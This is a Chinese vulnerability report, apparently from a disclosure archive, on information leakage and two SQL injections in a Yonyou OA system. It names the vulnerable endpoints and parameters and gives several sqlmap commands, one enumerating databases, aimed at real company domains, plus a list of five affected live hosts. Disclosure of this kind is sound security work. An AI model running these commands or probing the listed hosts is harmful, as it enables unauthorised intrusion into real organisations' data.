VULHUB ™

### 简要描述： 用友系统敏感信息泄露+两个SQL注入 ### 详细说明： 下面的连接存在信息泄露+两个SQL注入 sql注入1：/sys/sortListUI.jsp?searchKeyvalue=8 sql注入2：/witapprovemanage/report/comReimburse.jsp?comid=1 http://oa.hzuf.com:9090/sys/sortListUI.jsp?searchKeyvalue=8 [<img src="https://images.seebug.org/upload/201408/30223622bd6951e2f939428e3db8d5d7c7561a07.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/30223622bd6951e2f939428e3db8d5d7c7561a07.jpg) sqlmap -u "http://oa.shunhengli.com:9090/sys/sortListUI.jsp?searchKeyvalue=1&lx=1" [<img src="https://images.seebug.org/upload/201408/30223731b3390b41b6502457fbe3d09bd67a6979.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/30223731b3390b41b6502457fbe3d09bd67a6979.jpg) sqlmap -u "http://oa.shunhengli.com:9090/witapprovemanage/report/comReimburse.jsp?comid=1" [<img src="https://images.seebug.org/upload/201408/30224055c25423feb58f709fd098f7027f6e1d4d.jpg" alt="11.jpg"...

### 简要描述： 用友系统敏感信息泄露+两个SQL注入 ### 详细说明： 下面的连接存在信息泄露+两个SQL注入 sql注入1：/sys/sortListUI.jsp?searchKeyvalue=8 sql注入2：/witapprovemanage/report/comReimburse.jsp?comid=1 http://oa.hzuf.com:9090/sys/sortListUI.jsp?searchKeyvalue=8 [<img src="https://images.seebug.org/upload/201408/30223622bd6951e2f939428e3db8d5d7c7561a07.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/30223622bd6951e2f939428e3db8d5d7c7561a07.jpg) sqlmap -u "http://oa.shunhengli.com:9090/sys/sortListUI.jsp?searchKeyvalue=1&lx=1" [<img src="https://images.seebug.org/upload/201408/30223731b3390b41b6502457fbe3d09bd67a6979.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/30223731b3390b41b6502457fbe3d09bd67a6979.jpg) sqlmap -u "http://oa.shunhengli.com:9090/witapprovemanage/report/comReimburse.jsp?comid=1" [<img src="https://images.seebug.org/upload/201408/30224055c25423feb58f709fd098f7027f6e1d4d.jpg" alt="11.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/30224055c25423feb58f709fd098f7027f6e1d4d.jpg) sqlmap -u "http://oa.shunhengli.com:9090/sys/sortListUI.jsp?searchKeyvalue=1&lx=1" --dbs [<img src="https://images.seebug.org/upload/201408/302237494be9773334710c04d770dbe3fefc11f5.jpg" alt="3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/302237494be9773334710c04d770dbe3fefc11f5.jpg) 5个案例： http://oa.shunhengli.com:9090/sys/sortListUI.jsp?searchKeyvalue=1&lx=1 http://oa.hzuf.com:9090/sys/sortListUI.jsp?searchKeyvalue=1&lx=1 http://oa.chnjcdc.com:9090/sys/sortListUI.jsp?searchKeyvalue=1&lx=1 http://115.29.234.197:8090/sys/sortListUI.jsp?searchKeyvalue=1&lx=1 http://119.145.194.122:9090/sys/sortListUI.jsp?searchKeyvalue=1&lx=1 ### 漏洞证明： [<img src="https://images.seebug.org/upload/201408/302237494be9773334710c04d770dbe3fefc11f5.jpg" alt="3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/302237494be9773334710c04d770dbe3fefc11f5.jpg)